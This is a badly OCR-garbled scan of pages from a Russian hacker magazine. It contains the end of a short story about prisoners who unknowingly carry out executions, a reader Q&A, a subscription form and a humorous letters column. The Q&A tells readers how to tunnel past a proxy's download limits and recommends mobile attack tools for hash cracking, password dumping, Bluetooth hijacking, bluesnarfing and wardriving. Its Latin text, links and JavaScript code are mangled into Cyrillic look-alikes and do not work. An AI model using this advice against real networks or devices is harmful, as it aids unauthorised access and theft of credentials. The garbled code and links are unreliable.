— Точно, — подхватил Макс. — У меня все было 
очень похоже. Размер моей проблемы был боль- 
ше, чем мои возможности по ее исправлению. 
Когда я сидел в камере, я был уверен, что жизнь 
кончена, даже не начавшись. Тот человек, что 
подсунул мне контракт, практически дал мне 
шанс начатьсначала. Еще шесть месяцев — и 
мой контра кт за кончится. Когда я последний 
раз смотрел свой счет, там была очень даже 
приличная сумма. Начну сначала, в очередной 
раз. А насчет безумных и глупых контрактов я 
категорически не согласен. Все обосновано, 
все четко прописано... 

— Ты прекрасно понял, о чем я, — ответил 
Лаврик. — Вся глупость в том, что нам платят 
деньги за дурдом. Сидишь, ждешь, по свистку 
втыкаешься в экран, смотришь, смотришь, а 
потом клац... и все. Деньги уже на счету. 

— Так радуйтесь, — прокомментировал Клим. 

— Тебе сколько светило, Лаврик? 
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— Шесть лет. 

— Атак всего три, плюс неплохой приработок. А 
тебе, Макс? 

— Поменьше. Четыре. Могло быть и еще 
меньше, ноя попытался скрыть следы... А эти 
гребаные опера... 

— А вот тут потише и поменьше лирики, — вме- 
шался Клим. — Каждый из нас делаетсвою 
работу. Мы — свою. Опера — свою. Каждый ест 
свой хлеб. 

— Я не против, — ответил Макс. — Я хочу понять 
смысл этого обезьянника. Каждый день на 
протяжении этихдвухс половиной летяхочу 
понять — и у меня не получается. Мне не хватает 
информации. 

— Ее никому не хватает, — поддержал Клим. 

— Мнетоже, но ведь кто ищет, тот всегда найдет. 

— Ты искал? — Лаврик явно ходил по краю. 

— Только честно. Не думаю, что нас всех порвут 
на кусочки, даже если пишут или еще что-ни- 
будь делают. 



— Есть у меня мысли... — засопел Лаврик. — Но 
какие-то они невнятные... Шальные мысли. Мо- 
жет, мы в космос кого-нибудь запускаем? Типа 
«ключ на старт»... 

— Супер, — Клим хохотнул. — Просто супер. 
Даже не знаю, что сказать. Хотя чем меньше 
объяснение похоже на правду, тем оно ближе 
к истине. Хоть в космос, хоть в океан, хоть в 
крематорий... 

— Мне почему-то последнее ближе, — вдруг 
вставил слово Макс. — В крематорий по 
расписанию... 

— Может, пока не поздно, заткнемся от греха по- 
дальше?— поинтересовался Клим. — Тем более 
завтра у нас будет целый день... Пообщаемся. 

— И частоты со всеми общаешься, програм- 
мер? — буркнул Лаврик. — Сидишь в баре, 
сосешь свои коктейли, пока не нарежешься 
насмерть! Сам-то за что здесь? Все молчишь... 

— Точно, Лаврик, — поддержал Макс. — Давай, 
говори. Хватит отмалчиваться. Теперь не выйдет. 



«Я ЗАГРЕМЕЛ В ЭТОТ ПРОЕКТ ПОТОМУ, 
ЧТО ПОПАЛСЯ НАВЗЛОМЕ.У МЕНЯ НЕ 
БЫЛО ВЫХОДА - УЩЕРБ ОТ МОЕГО ПРО- 
НИКНОВЕНИЯ СОСТАВИЛ БОЛЬШЕ ПЯТИ- 
ДЕСЯТИ ТЫСЯЧ ДОЛЛАРОВ» 



— Не порвут, — согласился Клим. — Но срок 
могут добавить. И будем еще пару леттут кнопки 
нажимать, как куклы дрессированные. Деньги 
станут не в радость... 

— А какбыть стем, что любопытство набрало 
критическую массу и идет цепная реакция? 

— сумничал Лаврик. — И уже скоро бабахнет? 

— Тыточно поверил, что нас пишут, — рассмеялся 
Макс. — А иначе зачем ты такумничаешь? Хочешь, 
чтобы на тебя обратили особенно пристальное 
внимание? Не переживай, тебя незабудут. 

— Давайте лучше вместо споров просуммиру- 
ем информацию, — предложил Клим. —У кого 
какие соображения? 

Парни замолчали. Они вспоминали то, что им 
показалось наиболее странными и загадоч- 
ными. Такого рода фактов набралось не очень 
много, но каждый из них попадал вточку. 

— Во-первых, нам не разрешают встречаться 
больше одного раза в три недели, и только после 
того, как мы в очередной разтут щелкнем этими 
чертовыми кнопками, — начал Макс, и Клим тут 
же его перебил: 

— И мы, если вы обратили внимание, выпол- 
няем свою работу каждыетри недели. За все 
то время, что существует наша команда, этот 
график не нарушился ни разу. 

— Кстати, у кого есть соображения насчетэтой 
периодичности? — спросил Лаврик. 

— Никаких, — буркнул Макс. — Понятия не 
имею, что можно делать каждыетри недели. 



Клим замолчал. Снова раздалось постукивание 
по ноутбуку. 

— В принципе, мне скрывать-то особенно 
нечего. Набор стандартный. Снятиетриальных 
ограничений в коммерческих программах. 

— И неужели за это можно в тюрьму угодить? 

— присвистнул Лаврик. 

— Можно. При превышениитой самой крити- 
ческой массы, о которой ты только что распинал- 
ся, — Клим говорил сухо, особо не распростра- 
няясь. — Наломал дров... Полез туда, куда лезть 
не стоило. Ну а заказчикслабоватоказался. 

Сдал меня сразу. 

— Да-а, — протянул Лаврик. — Мы другдруга 
стоим. Клим, тебя тоже деньгами приперли? 

— Нет, тюрьмой. У меня астма. Если вы за два 
года не догадались... В камере умербы давно. А 
так сижу здесьживой и скоро выйду. 

— Мне кажется, скоро будет команда, — совсем 
не втему сказал Макс, и все машинально 
взглянули на экраны своих ноутбуков. — Стоит 
свернуть дискуссию. 

— Принимается, — согласился Клим. — Вни- 
мательно делаем свою работу и встречаемся в 
баре. Завтра. Если пустят. 

— Пустят, — уверенно сказал Лаврик. — Куда 
они денутся? 

— Знаешь, почемутытакдумаешь?Тыуверен, 
что кроме нас эту идиотскую работу никто не 
сделает. А вдруг есть такие люди? — Клим умел 
задавать такие вопросы, от которых хотелось 



лезть на стену. — Вдругза дверями уже стоят... 
сменщики? 

— Думаешь, это возможно? — усмехнулся Макс. 

— Конкурс — сто человек на место. «Эй, кто 
хочет нажимать кнопку за пять штук баксов в 
месяц?!» Бред. 

— Здесь любой бред имеет право на сущест- 
вование, — подытожил Клим. — Хватит. Ждем 
сигнала. 

И он вынул «каплю» наушника и положил на 
ноутбук. Ему сейчас не нужны были вопросы и 
охи- вздохи напарников. Нужна была тишина. 
Оглянувшись, он увидел смотрящий на него 
глазок видеокамеры. Он подмигнул ему, а потом, 
окончательно обнаглев, помахал рукой. 

— Они всему верят, — сказал он, убедившись, 
что микрофон тоже отключен. — Я не знаю, 
хорошо это или плохо. Наверное, ложь всегда 
отвратительна. Но лучше не знать... 

Сам онузнал давно. Недаром Клим многое умел. 
Он всегда был уверен, что если из компьютера 
выходит, кроме сетевого шнура, еще хотя бы один 
провод, то грех этим проводом не воспользовать- 
ся. Когда он понял, что ихтриоуправляется цент- 
рализованно, то решил узнать об этом побольше. 
Потихоньку, за всеми этими играми в города, 
Клим писал программу. На это ушло примерно 
два месяца. И когда последний штрих был 
сделан, он запустил своетворение. 

Ближе всех к реальному положению вещей 
оказался сегодня Макс. Его догадки насчет кре- 
матория были недалеки от истины. Можно даже 
сказать, Макс практически попал вточку. Они 
вершили приговоры. Они претворяли вжизнь 
смертную казнь. Каждыетри недели в этой 
стране заседал трибунал. Каждыетри недели... 
Давно они не были на свободе... 

Там многое изменилось. Снова появились«враги 
народа» и «особые совещания». И была нужна 
гуманная «расстрельная команда». Три человека, 
которые ничего незнали, просто жали на кнопки. 
И где-то далеко срабатывала гильотина. Или еще 
что-нибудь. Может, даже электрический стул. 
Когда Клим понял это, он пошел дальше. Он решил 
выяснить, почему именнотрое. Оказалось, что ал- 
горитм казни предполагаеттайну — никто не дол- 
жен знать, чей именно компьютер сыграл роковую 
роль. Случайный алгоритм разбрасывал вероят- 
ности потрем ноутбукам; каждый сидел и смотрел 
на экран с определенной целью — поймать нужную 
фигурку. Все зависело отскорости реакции и 
внимания. Кто первый увидит, тот и шлепнет по 
клавиатуре. И при этом каждый чист перед собой и 
перед мировым гуманным сообществом. 

Клим тогда подумал, а сколько раз он был пер- 
вым? Сколько человекубил лично он? Осознав 
это, он решил изменить ситуацию — настолько, 
насколько это было возможно. Поколдовав еще 
немного, он внес изменения в алгоритм. 

И теперьубивали только Лаврик и Макс. В 
промежуткахуспевая играть в города... А Клим 
молча смотрел на фотографию девушки, раз- 
глаживая ее уголок пальцем, и думал отом, что 
никогда не был святым. Атеперь и подавно... тг 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ МН 
ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХАКОМ/КРЯКОМ/ФРИКОМ, ДЛЯ 
ЕСТЬ НАСК-ЕАО (НАСКЕАО@ВЕАІ_. ХАКЕР. ВЫ); НЕ СТОИТ ТАКЖЕ ЗАДА- 
ВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТ НА КОТОРЫЕ ТЫ 
ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я НЕ ТЕЛЕПАТ, 
ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ 
ИНФОРМАЦИИ. 



О: Знаю, что у многих ноутбуков час- 
то бывают проблемы с установкой 
І_іпих. Непонятные ошибки, сложно 
разрешимые несовместимости — все 
это знакомо каждому, кто пытался 
установить пингвина на лэптоп. Так 
вот вопрос следующий: как подстра- 
ховаться и купить именно то, что 
тебе подойдет в дальнейшем для 
работы под никсами. Для меня это 
важно. 

А: Самый проверенный способ — это попробо- 
вать бук в действии. Возьми ЫѵеСО на платфор- 
ме, |<оторур в будущем будешь использовать: 
например, если это Зіаскѵѵаге, то идеально 
под о йдет Біах. Ищи в магазин и внимательно 
все протестируй. Правда, есть еще один способ 

— обратиться к специальной базе данных 
ѵѵѵѵѵѵ.ііпих-іаріор.пеі: . Пользователи постоянно 
обновл я ют ее, делясь опытом и добавляя ин- 
формацию отом, какой дистрибутив на том или 
ино-м ноутбуке заработал, а какой нет. 

О: В институте есть свободный до- 
ступ в интернет. Ограничение одно 

— подключение идет через прокси, 
и на нем стоит запрет на закачива- 
ние файлов размером более 300 Кб 
(или около того). А качать хотелось 
бы побольше и не один раз. Как это 
осуществить? 



А: Каквообще можно о’бойти ограничения прок- 
си? Нужно сделать так, чтобы глупый прокси- 
сервер просто не знал, что именно ты делаешь 
в интернете, и тогда ктвоей активности он 
никак не сможет применить часть заложенных 
правил. Лучший способ замаскировать свою 
деятельность — это поднять туннель. Сущест- 
вуетдовольно много различных реализаций, 
которые применимы в одних и неприменимы 
в др угих случаях. Но для обхода большинства 
ограничений прокси-сервера специально раз- 
работана утилита Ьоипсег [ ѵѵѵѵѵѵ.агЕі .ги/~ІіопбІ5И/ 
гивЛеаіигев.Ыт І. 

О: Многие подозрительные файлы 
я запускаю под виртуальной маши- 
ной. Так надежнее. Правда, иногда 
становится интересно, а что же эти 
файлики там натворили. Где и как 
себя прописали? Как это можно 
выяснить? 

А: В общем-то* большой проблемы в том, 
чтобы отследить активность одной из утилит 
на ком пьютере, нет. Допустим” ты используешь 
бесплатную версию МісгозоЛ ѴІНиаІ РС 2007 
( ѵѵѵѵѵѵ.тісгоБоЛ.сопп ). у которой есть замеча- 
тельная функция — инкрементные диски. Ее 
фишка втом, что в качестве основного образа 
для системы используется один изначальный 
диск, а всё произошедшие измененйя система 
сама помещает в специальный контейнер. 



Нам остается только сравнить его с оригиналь- 
ным, «чистым» диском, например, с помощью 
утилиты ѴѴІпй Гіі, которая входит в МісгобоіБб Шее 
Ріа та г гл 50 Кб, и все произошедшие изменения 
с файловой системой будут как на ладони. Для 
того чтобы активировать систему инкрементных 
дисков, в момент создания виртуального харда 
для гостевой ОС необходимо поставить галочку 
напротив опции Оіііегепііаі. Если какая-то 
подозрительная программа будет что г то отправ- 
лять в инет, это непременно отобразится в логах 
снифера. Проверено, что та кие продукты, как 
Раскеіугег ( 5оигсеІогде.пе1:/рго]ес1:5/раске1:у2ег 1 
и ѴѴІгеЗЬагк ( ѵѵѵѵѵѵ.ѵѵігеБЬагк.огд ). уверенно 
перехватываюттрафик, который уходите вирту- 
альной машины. Рекомендуем! 

О: Много рассказывая о программах 
для взлома под винду и никсы, вы 
почему-то незаслуженно обходите 
стороной мобильные платформы. 
Разве хакеры не используют КПК 
или смартфоны для взлома систем? 
Вот именно, что используют. Ис- 
правьтесь и подскажите, например, 
какие утилиты для ѴѴіпсІоѵѵз МоЬМе 
могли бы быть интересны и полезны 
взломщику? 

А: Большинству из нас знакома программа 
Саіп&АЬеІ ( ѵѵѵѵѵѵ.охіё.іі ). сыскавшая славу 
одной из самых продвинутых утилит для 
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подбора паролей и хэшей. Так вот для ѴѴІпсіоѵѵб 
МоЬІІе существует ее портированная версия. 



2Іддигаі29.сот/оѵрпррс-таіп.Ыт ). Впрочем, он 
пригодится и просто для того, чтобы установить 



Причем функциональность ее почти неурезана: 
по-прежнему поддерживается взлом хэшей 
І_м] КІЛИ, М02, МБ4, М05, 5НА1 , РІРЕМ01 60, 
СізсоРІХи МуЗОБ, декодирование для Вазе64. 

Но если взламывать хэши средствами РоскеіРС 
едва лд/рэффективно, то функция снятия дампа 
с паролями для таких средств, как АсбѵеЗупс, 
Ростке! ІЕ.ДоскебОииоок и Роркеі М5Ы, будет 
очень и очень полезной. 

Двигаемся дальше. В каких случаях уместнее 
всего применять карманный компьютер для 
взлома? Правильно, при-взламе беспровод- 
ных сетей или устройств. Грех не пошалить 
с ВІиеІооіЬ-устройствами, которые можно 
обнаружить букаально-таки в любом месте, 
даже просто переходя улицу. И один из лучших 
помощников в этом — утилита ЬіСгаѵѵІег 
( ѵѵѵѵѵѵ.зіІепІзегѵісез.бе/ЬіСгаѵѵІег.ИітІ ) . Это 
самый обУічный и простой сканер с возможнос- 
тями Ыі^аскіпд'и ЫиезпаНіпд для устройств, 
использующих стек Місгозо^ ВІиеіюоШ. На 
очереди ѴѴі-Рі и средства для ѵѵагбгіѵіпд’а: гуру 
в этом деле рекомендуют небольшой сканер 
ѴѴіРІРоРигб [ ѵѵѵѵѵѵ.азресіо-зо^ѵѵаге.сот/гѵѵ/ 
аррІісаІіопз/ѵѵібЫит ). В отличие от многих 
подобныхтулз, он поддерживает практически 
все виды карт, проводные и беспроводные ѲР5- 
адаптеры.'а также умеет экс портировать инфор- 
мацию о найденныхто^ках в самом различном 
виде, включая формат ЫеізШтЫег (пзі ). 

Не обойтись и без джентльменского набора 
обычных сетевых утилит: порт-сканера, БЫВ 
Іоокир’а, калькулятора ІР-сетей, банального 
ріпд’а. ѵхЦШ Регзопаі [ ѵѵѵѵѵѵ.сапп.сопп/ѵхціііі 
регз.ЫтІ ) собрал все в одном флаконе. Единс- 
твенное, чего ему не хватает, — это возмож- 
ностей известного «швейцарского ножа» под 
именем пеісаі:, который используется чутьли не 
в каждом взломе. К счастью, существует специ- 
альная версия пеіюаідля мобильной платфор- 
мы — ЫеЦаНогСЕ [ ШрУ/рННегпипі-Ьадеп. 
бе/%7ЕЫзсЬоГ/ѵѵіпсе/#пеІсаі ). Что радует, 
лсжшные. функціи и здесь работают именно так, 
как и должны под виндой и никсами. Проска- 
нировать найденную сеть (к примеру, беспро- 
водную) на наличие открытых расшаренных 
ресурсов не проблема с программой ЫВТЭіаі 
СЕ ( ШрУ/зоигсеІюгде.пеі/ргоіесІз/пЬізіаісе ). 
Как-же быть судаленными управлением? Рулить 
порутанным серваком можно по-разному: либо 
-епо-мощью 55Н (-для этого пригодится Рос+ееі — 
РиТТУ — ѵѵѵѵѵѵ.роскеірииу.пеі: ). либо с помощью 
функции удаленного рабочего стола прямо с 
экрана КПК, если установить на него ѴКІС Ѵіеѵѵег 
( ЬНрУ/сІоіпеб/псщоигсеЬгде.пеі ). Причем 
ничто не мешаеттебе сохранитьанонимность и 
использовать шифрованное ѴРІ\І -соединение 
благодаря клиенту ОрепѴРЫ [ ШрУ/оѵрпррс 



виртуальную частную сеть со своим домом. 

Ну и последнее. Сидя в кафе сустойчивым ѴѴІ-ЕІ 
соединением, можно сэкономить денежек на 
разговорах, если вместо мобильника исполь- 
зовать Экуре [ ѵѵѵѵѵѵ.зкѵре.сот/іпи/еп-дЬ/ 
ЗоѵѵпІоасІ/зкѵре/тоЬІІе ). 

О: В одной из статей вы упомянули об 
альтернативных потоках на ЛТР5- 
дисках? А каким образом их вообще 
можно просмотреть. Это же реально? 

А: Вообще говоря, штатными средствами вин- 
ды это сделать нельзя, несмотря на то что подхо- 
дя щи е ути л иты от М і с гѳеѳГ все же е сть. Можн о 
зайти на ЬирУ/ппзбп.ппісгозо^.сопп/ІІЬгагѵ/еп- 
из/бпПез/ЫтІ/пИ'зб.азр и скачать оттуда файл 
ЫТЕЗехбехе. В архиве, помимо всего прочего, 
будет библиотека зігтехбсіи, которую нужно по- 
ложить в папкузуз1епп32 и прописать в системе 
с помощью команды гедзѵг32 ЭіттЕхісІІІ. Теперь 
в окне свойств каждого из файлов появится 
новая вкладка, на которой будет отображена 
информация об альтернативных потоках. 

Этот способ едва ли полезен для того, чтобы 
найти скрытые данные, но пригодится, если ты 
знаешь, где именно их искать,' чтобы посмот- 
реть. Вполне реально добавитьта кую вкладку 
и для окна свойств папки. Для этого в реестре 
нужно прописать следующее: НКЕѴ_СБА55Е5_ 
Р00Т\Вгіѵе\5Ьеиех\Ргорегіу5ИееіНапб[егз\ 

{СЗЕ 01 679-8 1 4В-4ОА9-АВ00- 1 САС71 Е5Е337}. 
Если объем доступной памяти и занятого про- 
странства в сумме намного менышезаявленного 
объема жесткого диска, есть все основания пола- 
гать, что внушительная часть данных кроется где-то 
в альтернативных потоках. Исследовать свойства 
каждой папки в надежде найти данные — способ 
для мазохистов. Для эффективного поиска альтер- 
нативных потоков была написана миниатюрная 
консольная утилита ЕАОЭіизіАиегпаІе 0а1;а 
Эігеатз), которая легко сосканирует нужный диск 
или обычную директорию. На выходе ты получишь 
списоквсех файлов и размер альтернативных пото- 
ков, которые кним привязаны. Бесплатная версия 
этой замечательной утилиты доступна здесь: ѵуѵѵѵѵ. 
ЬеузоІЕбе/піАабз.гір . Однако использовать ее воз- 
можно исключительное правами администратора. 
Но, что удивительно, сами скрытые потоки может 
создавать кто угодно, даже гость. 

О: Как одними только средствами 
иаѵаЗсгірІ импортировать данные из 
ХМІ_-файла? Это очень критично, так как 
обработка данных должна выполняться 
не на сервере (в этом случае я бы просто 
все сделал с помощью РНР), а именно на 
стороне клиента (то есть его браузером). 
Подскажи наиболее изящный метод. 



А: Я как-то тоже столкнулся с подобной 
проблемой и даже умудрился найти огромную 
библиотеку для 35, в которой было реали- 
зовано все, что только можно для работы с 
ХМБ-файлом, включая 5АХ- и БОМ-парсеры. 
Первый обрабатывает файл последователь- 
но (попутно выполняя с данными какие-то 
действия, не сохраняя их в памяти), второй 

— целиком, загружая всю информацию в 
память (с которой потом можно делать все нто 
угодно). Но громоздкость решения меня тогда 
слегка испугала, и я решил найти альтерна- 
тиву. Оказалось, не зря. Дело втом, что в ядро 
самого ЗаѵаЗсірі по умолчанию заложены 
возможности для эффективной обработки ХМБ. 
Реал-изуетея это ѳледующим образом (работает 
почти во всех браузерах): 

бипсбіоп ітрогбХМЬ ( ) 

{ 

іб (сіоситепб . ітріетепбабіоп 
&& сіоситепб . ітріетепбабіоп . 
сгеабеБоситепб ) 

{ 

хтІБос = сіоситепб . 
ітріетепбабіоп . 
сгеабеБоситепб 
пиіі); 

хшІБос . опіоасі = 
сгеабеТаЫе; 

} 

еізе іб (міпсіотли АсбіѵеХОЬЗ есб ) 

{ 

хшІБос = п еѵі АсбіѵеХОЬз есб 
( "Місгозобб .ХМЫХМ" ) ; 

хгпІБос . опгеасЗузбабесЬапде = 
бипсбіоп () { 

іб (хшІБос . геасіуЗбабе == 4) 
сгеабеТаЫе ( ) 

} ; 

} 

еізе 

{ 

аіегб ( ' Уоиг Ьгоѵ^зег сап\ ' б 
ЬапсИе бМз зегірб ' ) ; 
гебигп; 

} 

хшІБос . Іоасі («хакер . хші») ; 

' ) 

После этого будет создан объектхтІБос, с 1 
помощью методов которого можно обратиться 
к любому полю ХМБ-файла. Для этого'нужно 
лишь знать одну-единственную функцию-метод 

— деіЕІете - пШВуТад№ппе. Подробнее тут: 
ѵѵѵѵѵѵ.диігкзппобе.огд/бопп/іппрогІхппІ.ЫппІ. ИНИ 
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ПО ВСЕМ ВОПРОСАМ р связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москвичей) и 8(800)200-3-999 (для 
жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 
Вопросы о подписке можно также направлять по адресу іпЬѲдІс.ги или прояс- 
нить на сайте ѵѵѵѵѵѵ.ОБС.ги 



— 

Теперь ты можешь получать 
журнал с КУРЬЕРОМ 

не только в Москве, но и в Санкт-Петербурге, Уфе, 
Нижнем Новгороде, Волгограде, Казани, Перми, 
Екатеринбурге, Челябинске, Омске. 

Подробности на стр. 012. 

У 



КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 

• их из журнала, сделав ксерокопию или распечатав с сайта 
ѵѵѵѵѵѵ.діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 

• квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 1 19992, Москва, 

ул. Тимура Фрунзе, д. 1 1 , стр. 44-45, ООО «Г ейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в редакцию по факсу 
или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по почтовому адресу 
редакции. 

Рекомендуем использовать факс или электронную почту, в последнем случае предвари- 
тельно отсканировав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один календарный месяц после опла- 
ты. Например, если вы производите оплату в ноябре, то журнал будете получать с января. 



СТОИМОСТЬ ЗАКАЗА НА КОМПЛЕКТ ХАКЕР+РѴР 



1 080 руб за 6 месяцев 1 980 руб за 1 2 месяцев 

5292 руб за комплект Хакер ОѴО + Спец СР + Железо РѴР 



1 номер 
всего за 
147 рублей 



| на журнал Хакер ОѴБ 
I I комплект Хакер ОѴБ + Спец СО + 

І — 1 Железо ОѴЭ 

| | на 6 месяцев 

^|на 12 месяцев 

начиная с 2007 г. 



□ Доставлять журнал по почте 
на домашний адрес 
Доставлять журнал курьером: 



□ 

□ 



на адрес офиса * 
на домашний адрес** 
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в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 
р/с № 40702810509000132297 
к/с № 30101810900000000990 

БИК 044583990 КПП 770401001 

Плательщик 

Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


2007 г. 





Кассир 



месяц 

Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 

р/с № 40702810509000132297 

к/с № 30101810900000000990 

БИК 044583990 КПП 770401001 

Плательщик 
Адрес (с индексом) 



Кассир 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


2007 г. 




месяц 

Ф.И.О. 


Подпись плательщика 









На письма отвечал веселый доктор Лозовский 



Апіоп Ооіуппіу (іохаѵісШтаіі ш) 

Без темы 

День добрый, иногда читал Ваш журнал, когда знакомые высылали 
из Москвы, очень заинтересовался им, хотел бы узнать, где его можно 
получать в городе Запорожье, Украина! 

Заранее благодарен! Ваш читатель! 

Голодранці усих краин, гетьдо кучи! Не ручаюсьза точность перевода, но, 
по-моему, это означает что-то вроде: «Продвинутые компьютерщики всех 
стран мира имеют право получать журнал «Хакер» по подписке!» Сущест- 
вуетже наш журнал на литовском (а может, и латвийском или латышском 
— кто их разберет) языке. Называется он Насккегіз. Когда я читал свои 
статьи на этом могучем языке, я ржал так, что тряслись редакционные сте- 
ны, а с потолка падали летучие мыши и фрески времен Кайзера. В общем, 
берисьза локализациюжурнала «Хакір», регистрируй домен хакір.иа, 
плати нам 10000 гривін за право издания и зажигай! 



(зкуііѵе@таіІ.ги) 

Без темы 

Привет, моя любимая редакция самого любимого журнала «Хакер». 
Воот пишу вам просто потому, что воот написал рассказик. . . И хочу, 
чтобы читатели его оценили ), если это возможно, конечно. 

Желаю вам всем всего-всего ). 

Р.З. Если будете публиковать, напишите и, если не будете, тоже напи- 
шите, пожалуйста ). Ну усе ). Всем удачи. 

I ѴѴаІкАІопе... 

Привет, С кити в! Жал ь, что я в свое время не написал на первой стра- 
нице рубрики что-то вроде: «Рукописи принимаются, но не читаются, 
а если читаются — то не возвращаются, а если и возвращаются — то 
только в испорченном и заляпанном виде». Короче говоря, я внима- 
тельно пролистал твой труд. Понял, что там про наркоту и что кончается 
он плохо. Ты спросишь, понравился ли мне твой труд? Отвечу словами 
главного редактора издательства «ПРАКТИКА»: «У секретаря Толстого 
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Бирюкова был штампик с надписью: "Лев Николаевич Толстой прочел 
Ваши стихи и нашел их ОЧЕНЬ ПЛОХИМИ”» (приколись, печать — и 
в оффлайне, и никакого ЖЖ!). Нет, я отнюдь не хочу принизитьтвое 
произведение, но читать почти 7 Кб текста, большая часть которого 
— троеточия и всякие отжиги типа: «...легкий ветерок касался ее 
кожы... он пробежался по ее прекрасным... густым темным волосам... 
она гладила ее щеку» — это полный хардкор. Уволь! Лучше пришли нам 
каких-нибудь частноэротических фотографий полногрудых девушек, а 
сам — потренируй свой талант апокалипсического триптиха вот на этой 
песенке В. Голованова: 

Все веревки намылены, 

Вены бритвой попилены, 

Ванна кровью побрызгана, 

Помощьскорая вызвана. 

Полныйтекстты найдешьс помощью любого поисковика или на нашем 
диске (я передал его Степу). 



Тепла (сооІ.Іюскеі@Іі$і.ги) 

Верните Даню в «Ху мор» 

Дарова, парни. Только не ржите над моим маяком, ладно? 

Я чего пишу, большая просьба, если можно, верните в журнал рубрику 
«Хумор» под редакцией Дани Шеповапова. Или хотя бы пусть он пишет 
вместе с ГѵІіго. Просто ко мне попал октябрьский номер с почти полной 
подшивкой журнала на диске, и мне показалось, что сейчас его статьи 
очень гармонируют со всем журналом. А то будет как в стихе, который 
Даня, кстати, и сочинил: 

Маленький хакер насиловал ОеШ, 

Сделать хотел он летающих эльфов. 

Член не стоит, близорукость, сутулость, 

Так же и ты про***шь свою юность! 

Заранее спасибо. 

Здорово, мужик! Ты прямо какбудто пришел из далекого прошлого, из 1999 
года! Так и хочется ответитьтебе словами Холода: «Целуем в десны, твои 
мухорчатые суслики» — или там: «Увидимся через месяц, если журнал 
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тада2Іпе@геа1.хакер.ги 



не сожрут пупырчатые гонобобели». Кстати, восхищен твоей логикой 
— даже после злоупотребления сначала соком ямайского кактуса, а затем 
лягушки ужасного листолаза я не понял, какая связь между изнасилова- 
нием Дельфи и соавторством (хорошо, не сожительством: будучи упертым 
натуралом и самым настоящим хирургом, Ниро бы этого не пережил) Ниро 
сДанечкой. Видимо, эта связь довольно призрачна. Короче! Не будет 
никакого Дани в«Хуморе»! 



Юрий Луканин (геггШизиг.ш) 

Вопрос по журналу 

Здравствуйте. Библиотека Томского государственного уни- 
верситета систем управления и радиоэлектроники хотела бы 
приобрести электронную версию издания (если она существует) 
«Хакер + ОБ» и «Хакер/Спецвыпуск журнала + ОБ». В случае на- 
личия электронных версий, просьба сообщить, за какой период 
они есть, каковы условия использования электронных архивов 
в корпоративной вычислительной сети университета, а также их 
стоимость. 

С уважением, Юрий Луканин 
Центр ТУ СУ Р-Т елеком 

Здравствуйте, уважаемый Юрий. Спешу ответить на Ваш запрос 
срочной авиапочтой. Для того чтобы обогатить Вашу библиотеку 
электронной версией издания нашего журнала, нужно взять в правую 
(левшам — в левую) руку манипулятор типа «мышь», с помощью I ВМ 
РС/ХТ совместимой персональной ЭВМ войти во всемирную сеть Ин- 
тернет, с помощью обозревателя интернета проследовать на сетевой 
узел хакер. ги (обратите внимание на занятную транслитерацию рус- 
ских букв в латинские) и скачать (то есть скопировать на локальный 
компьютер) все необходимые Вам выпуски журнала в универсальном 
формате РйР. Также Вы имеете возможность покупать наши журнал ы с 
двухслойными дисками (0Ѵ0-Р0М), на необъятных просторах которых 
всегда можно найти прошлые номера журналов. Огромное спасибо за 
Ваше письмо, пишите нам и впредь, сугубо и трегубо. 

Ваши мухорчатые гонобобели 



ѵііаІу-ѵоІд(ѵііаІу-ѵоІд@уапсІех.ги) 

Статья 

Доброе время суток! 

Огромная просьба — сделайте, пожалуйста, статью о написании 
драйверов для железа, в частности мышечно-клавиатурного типа. 
Очень интересуюсь. 

Р.З. Большое спасибо всем создававшим «Хакер», особенно Зіер'у 
за РБР'ы старых номеров на БѴБ. Было очень интересно посмотреть, 
каким журнал был раньше. 

Доброеутро! Конечноже, мы напишем много статей проустройства мышечно- 
клавиатурного, мышечно-костного и мышечно-кишечного типа. Будеточень 
занятноуправлятьсвоим и чужим кишечником с помощью простого драйвера! 
Представляешь, сколько проблем удастся решить с помощью подобныхтех- 
нологий? Просто уйму! Поручим этузадачу Крису Касперски, он-то уже давно 
управляетвсем своим организмом с помощью драйверов и прерываний. 



Ѳюѵег-Орііс(Ѳгоѵег-ОрНс@уапсІех.ги) 

Фигово все, как я посмотрю 

Добрый день. Не скажу, что я так уж часто читаю ваш журнал, но, тем не 
менее, иногда мне перепадают некоторые выпуски вашего мэгазина. 
Ребята, мне кажется, что все, что вы делаете, начинает очень сильно 
опопсевать и то, ради чего эта культура зарождалась, уходит в про- 
шлое. . . А почему? А все потому, что даже обезьяна может долбить 
клаву. . . А где же великие лозунги о свободе киберпространства и о 
свободе информации? Где это все? Все, что вы пишите, конечно, дает 
знания в плане полома и доступа к данным, но все же это все глу- 
пость. ..Ив большинстве случаев это все ради зеленых бумажек. Я не 
отрицаю того факта, что мани нужны, но хакинг — это протест против 
коммерческих сетей. . . Он ради этого и появился. Он появился ради 
того, чтобы дать обыденному люду то, что от него скрывает государс- 
тво, власть, зажравшиеся ублюдки, которые даже наши жизни оцени- 
вают в денежном эквиваленте. 

